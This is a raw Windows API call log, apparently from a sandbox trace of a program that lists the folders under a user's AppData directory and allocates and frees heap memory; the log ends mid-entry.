[0097.314] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.314] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33186b8 [0097.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0097.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330680 [0097.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fde0 [0097.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33186b8 | out: hHeap=0x630000) returned 1 [0097.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0097.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330680 | out: hHeap=0x630000) returned 1 [0097.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330680 [0097.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fde0 | out: hHeap=0x630000) returned 1 [0097.315] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330680 | out: hHeap=0x630000) returned 1 [0097.315] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.315] PathFindFileNameW (pszPath="") returned="" [0097.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33186b8 [0097.315] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.315] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33186b8 | out: hHeap=0x630000) returned 1 [0097.315] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.315] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9e316400, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x9e316400, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0097.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.315] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c) returned 0x3330680 [0097.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce068 [0097.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce208 | out: hHeap=0x630000) returned 1 [0097.316] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0097.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x38) returned 0x3331b88 [0097.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0097.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce068 | out: hHeap=0x630000) returned 1 [0097.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330680 | out: hHeap=0x630000) returned 1 [0097.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce068 [0097.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce208 | out: hHeap=0x630000) returned 1 [0097.316] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa088dbd0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa088dbd0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0097.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x54) returned 0x3338fa8 [0097.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce410 [0097.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce750 [0097.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0097.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce068 | out: hHeap=0x630000) returned 1 [0097.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3331b88 | out: hHeap=0x630000) returned 1 [0097.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce068 [0097.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.316] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce208 | out: hHeap=0x630000) returned 1 [0097.316] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa088dbd0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa088dbd0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0097.317] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0097.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0097.317] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.317] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.317] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.317] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.318] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.318] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.319] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.319] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.320] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.321] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.321] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.323] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.323] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.325] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.326] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0097.326] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.326] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330680 | out: hHeap=0x630000) returned 1 [0097.326] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.326] PathFindFileNameW (pszPath="") returned="" [0097.326] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa088dbd0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa088dbd0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0097.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332dab0 | out: hHeap=0x630000) returned 1 [0097.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 